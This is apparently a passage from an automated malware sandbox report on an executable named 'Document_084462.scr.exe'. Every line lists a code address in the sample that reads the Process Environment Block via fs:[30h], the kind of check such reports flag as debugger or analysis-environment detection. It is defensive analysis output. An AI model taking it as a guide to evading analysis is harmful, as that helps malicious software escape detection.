            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF75B mov eax, dword ptr fs:[00000030h]1_2_37AAF75B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3174B mov eax, dword ptr fs:[00000030h]1_2_37B3174B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3174B mov ecx, dword ptr fs:[00000030h]1_2_37B3174B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2D69D mov eax, dword ptr fs:[00000030h]1_2_37B2D69D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F68C mov eax, dword ptr fs:[00000030h]1_2_37B6F68C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA96E0 mov eax, dword ptr fs:[00000030h]1_2_37AA96E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA96E0 mov eax, dword ptr fs:[00000030h]1_2_37AA96E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB56E0 mov eax, dword ptr fs:[00000030h]1_2_37AB56E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB56E0 mov eax, dword ptr fs:[00000030h]1_2_37AB56E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB56E0 mov eax, dword ptr fs:[00000030h]1_2_37AB56E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B456E0 mov eax, dword ptr fs:[00000030h]1_2_37B456E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B456E0 mov eax, dword ptr fs:[00000030h]1_2_37B456E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B536E0 mov eax, dword ptr fs:[00000030h]1_2_37B536E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B536E0 mov eax, dword ptr fs:[00000030h]1_2_37B536E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B536E0 mov eax, dword ptr fs:[00000030h]1_2_37B536E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B536E0 mov eax, dword ptr fs:[00000030h]1_2_37B536E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B536E0 mov eax, dword ptr fs:[00000030h]1_2_37B536E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADD6D0 mov eax, dword ptr fs:[00000030h]1_2_37ADD6D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7623 mov eax, dword ptr fs:[00000030h]1_2_37AB7623
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB5622 mov eax, dword ptr fs:[00000030h]1_2_37AB5622
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB5622 mov eax, dword ptr fs:[00000030h]1_2_37AB5622
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEF63F mov eax, dword ptr fs:[00000030h]1_2_37AEF63F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEF63F mov eax, dword ptr fs:[00000030h]1_2_37AEF63F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5D62C mov ecx, dword ptr fs:[00000030h]1_2_37B5D62C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5D62C mov ecx, dword ptr fs:[00000030h]1_2_37B5D62C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5D62C mov eax, dword ptr fs:[00000030h]1_2_37B5D62C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE360F mov eax, dword ptr fs:[00000030h]1_2_37AE360F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADD600 mov eax, dword ptr fs:[00000030h]1_2_37ADD600
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADD600 mov eax, dword ptr fs:[00000030h]1_2_37ADD600
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B39603 mov eax, dword ptr fs:[00000030h]1_2_37B39603
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F607 mov eax, dword ptr fs:[00000030h]1_2_37B6F607
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B43608 mov eax, dword ptr fs:[00000030h]1_2_37B43608
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B43608 mov eax, dword ptr fs:[00000030h]1_2_37B43608
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B43608 mov eax, dword ptr fs:[00000030h]1_2_37B43608
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B43608 mov eax, dword ptr fs:[00000030h]1_2_37B43608
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B43608 mov eax, dword ptr fs:[00000030h]1_2_37B43608
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B43608 mov eax, dword ptr fs:[00000030h]1_2_37B43608
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7662 mov eax, dword ptr fs:[00000030h]1_2_37AA7662
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7662 mov eax, dword ptr fs:[00000030h]1_2_37AA7662
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7662 mov eax, dword ptr fs:[00000030h]1_2_37AA7662
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC3660 mov eax, dword ptr fs:[00000030h]1_2_37AC3660
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC3660 mov eax, dword ptr fs:[00000030h]1_2_37AC3660
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC3660 mov eax, dword ptr fs:[00000030h]1_2_37AC3660
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B45660 mov eax, dword ptr fs:[00000030h]1_2_37B45660
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3166E mov eax, dword ptr fs:[00000030h]1_2_37B3166E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3166E mov eax, dword ptr fs:[00000030h]1_2_37B3166E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3166E mov eax, dword ptr fs:[00000030h]1_2_37B3166E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD64A mov eax, dword ptr fs:[00000030h]1_2_37AAD64A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD64A mov eax, dword ptr fs:[00000030h]1_2_37AAD64A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3640 mov eax, dword ptr fs:[00000030h]1_2_37AB3640
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF640 mov eax, dword ptr fs:[00000030h]1_2_37ACF640
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF640 mov eax, dword ptr fs:[00000030h]1_2_37ACF640
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF640 mov eax, dword ptr fs:[00000030h]1_2_37ACF640
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB965A mov eax, dword ptr fs:[00000030h]1_2_37AB965A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB965A mov eax, dword ptr fs:[00000030h]1_2_37AB965A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE5654 mov eax, dword ptr fs:[00000030h]1_2_37AE5654
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B57591 mov edi, dword ptr fs:[00000030h]1_2_37B57591
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE9580 mov eax, dword ptr fs:[00000030h]1_2_37AE9580
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE9580 mov eax, dword ptr fs:[00000030h]1_2_37AE9580
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F582 mov eax, dword ptr fs:[00000030h]1_2_37B6F582
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5B58B mov eax, dword ptr fs:[00000030h]1_2_37B5B58B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5B58B mov eax, dword ptr fs:[00000030h]1_2_37B5B58B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5B58B mov eax, dword ptr fs:[00000030h]1_2_37B5B58B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5B58B mov eax, dword ptr fs:[00000030h]1_2_37B5B58B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE15EF mov eax, dword ptr fs:[00000030h]1_2_37AE15EF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB5E0 mov eax, dword ptr fs:[00000030h]1_2_37ABB5E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB5E0 mov eax, dword ptr fs:[00000030h]1_2_37ABB5E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB5E0 mov eax, dword ptr fs:[00000030h]1_2_37ABB5E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB5E0 mov eax, dword ptr fs:[00000030h]1_2_37ABB5E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB5E0 mov eax, dword ptr fs:[00000030h]1_2_37ABB5E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB5E0 mov eax, dword ptr fs:[00000030h]1_2_37ABB5E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B355E0 mov eax, dword ptr fs:[00000030h]1_2_37B355E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3B5D3 mov eax, dword ptr fs:[00000030h]1_2_37B3B5D3
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF5C7 mov eax, dword ptr fs:[00000030h]1_2_37AAF5C7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE1527 mov eax, dword ptr fs:[00000030h]1_2_37AE1527
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEF523 mov eax, dword ptr fs:[00000030h]1_2_37AEF523
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA753F mov eax, dword ptr fs:[00000030h]1_2_37AA753F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA753F mov eax, dword ptr fs:[00000030h]1_2_37AA753F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA753F mov eax, dword ptr fs:[00000030h]1_2_37AA753F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3536 mov eax, dword ptr fs:[00000030h]1_2_37AB3536
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB3536 mov eax, dword ptr fs:[00000030h]1_2_37AB3536
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB502 mov eax, dword ptr fs:[00000030h]1_2_37AAB502
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov ecx, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov ecx, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F51B mov eax, dword ptr fs:[00000030h]1_2_37B5F51B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD1514 mov eax, dword ptr fs:[00000030h]1_2_37AD1514
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6550D mov eax, dword ptr fs:[00000030h]1_2_37B6550D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6550D mov eax, dword ptr fs:[00000030h]1_2_37B6550D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6550D mov eax, dword ptr fs:[00000030h]1_2_37B6550D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B39567 mov eax, dword ptr fs:[00000030h]1_2_37B39567
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B56E mov eax, dword ptr fs:[00000030h]1_2_37B6B56E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B56E mov ecx, dword ptr fs:[00000030h]1_2_37B6B56E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B56E mov eax, dword ptr fs:[00000030h]1_2_37B6B56E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B55F mov eax, dword ptr fs:[00000030h]1_2_37B8B55F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B55F mov eax, dword ptr fs:[00000030h]1_2_37B8B55F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B654B0 mov eax, dword ptr fs:[00000030h]1_2_37B654B0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B654B0 mov ecx, dword ptr fs:[00000030h]1_2_37B654B0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3D4A0 mov ecx, dword ptr fs:[00000030h]1_2_37B3D4A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3D4A0 mov eax, dword ptr fs:[00000030h]1_2_37B3D4A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3D4A0 mov eax, dword ptr fs:[00000030h]1_2_37B3D4A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B55490 mov eax, dword ptr fs:[00000030h]1_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEB490 mov eax, dword ptr fs:[00000030h]1_2_37AEB490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEB490 mov eax, dword ptr fs:[00000030h]1_2_37AEB490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F4FD mov eax, dword ptr fs:[00000030h]1_2_37B6F4FD
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE54E0 mov eax, dword ptr fs:[00000030h]1_2_37AE54E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD94FA mov eax, dword ptr fs:[00000030h]1_2_37AD94FA
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD14C9 mov eax, dword ptr fs:[00000030h]1_2_37AD14C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF4D0 mov eax, dword ptr fs:[00000030h]1_2_37ADF4D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D430 mov eax, dword ptr fs:[00000030h]1_2_37B6D430
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D430 mov eax, dword ptr fs:[00000030h]1_2_37B6D430
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB420 mov eax, dword ptr fs:[00000030h]1_2_37AAB420
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7425 mov eax, dword ptr fs:[00000030h]1_2_37AE7425
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7425 mov ecx, dword ptr fs:[00000030h]1_2_37AE7425
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4B420 mov eax, dword ptr fs:[00000030h]1_2_37B4B420
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4B420 mov eax, dword ptr fs:[00000030h]1_2_37B4B420
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B39429 mov eax, dword ptr fs:[00000030h]1_2_37B39429
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3F42F mov eax, dword ptr fs:[00000030h]1_2_37B3F42F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F409 mov eax, dword ptr fs:[00000030h]1_2_37B6F409
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7460 mov eax, dword ptr fs:[00000030h]1_2_37AA7460
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA7460 mov eax, dword ptr fs:[00000030h]1_2_37AA7460
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F478 mov eax, dword ptr fs:[00000030h]1_2_37B6F478
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AED450 mov eax, dword ptr fs:[00000030h]1_2_37AED450
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AED450 mov eax, dword ptr fs:[00000030h]1_2_37AED450
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABD454 mov eax, dword ptr fs:[00000030h]1_2_37ABD454
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB93A6 mov eax, dword ptr fs:[00000030h]1_2_37AB93A6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB93A6 mov eax, dword ptr fs:[00000030h]1_2_37AB93A6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B51390 mov eax, dword ptr fs:[00000030h]1_2_37B51390
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B51390 mov eax, dword ptr fs:[00000030h]1_2_37B51390
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1380 mov eax, dword ptr fs:[00000030h]1_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACF380 mov eax, dword ptr fs:[00000030h]1_2_37ACF380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F38A mov eax, dword ptr fs:[00000030h]1_2_37B6F38A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE33D0 mov eax, dword ptr fs:[00000030h]1_2_37AE33D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD332D mov eax, dword ptr fs:[00000030h]1_2_37AD332D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B83336 mov eax, dword ptr fs:[00000030h]1_2_37B83336
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA9303 mov eax, dword ptr fs:[00000030h]1_2_37AA9303
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA9303 mov eax, dword ptr fs:[00000030h]1_2_37AA9303
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F30A mov eax, dword ptr fs:[00000030h]1_2_37B6F30A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3330C mov eax, dword ptr fs:[00000030h]1_2_37B3330C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
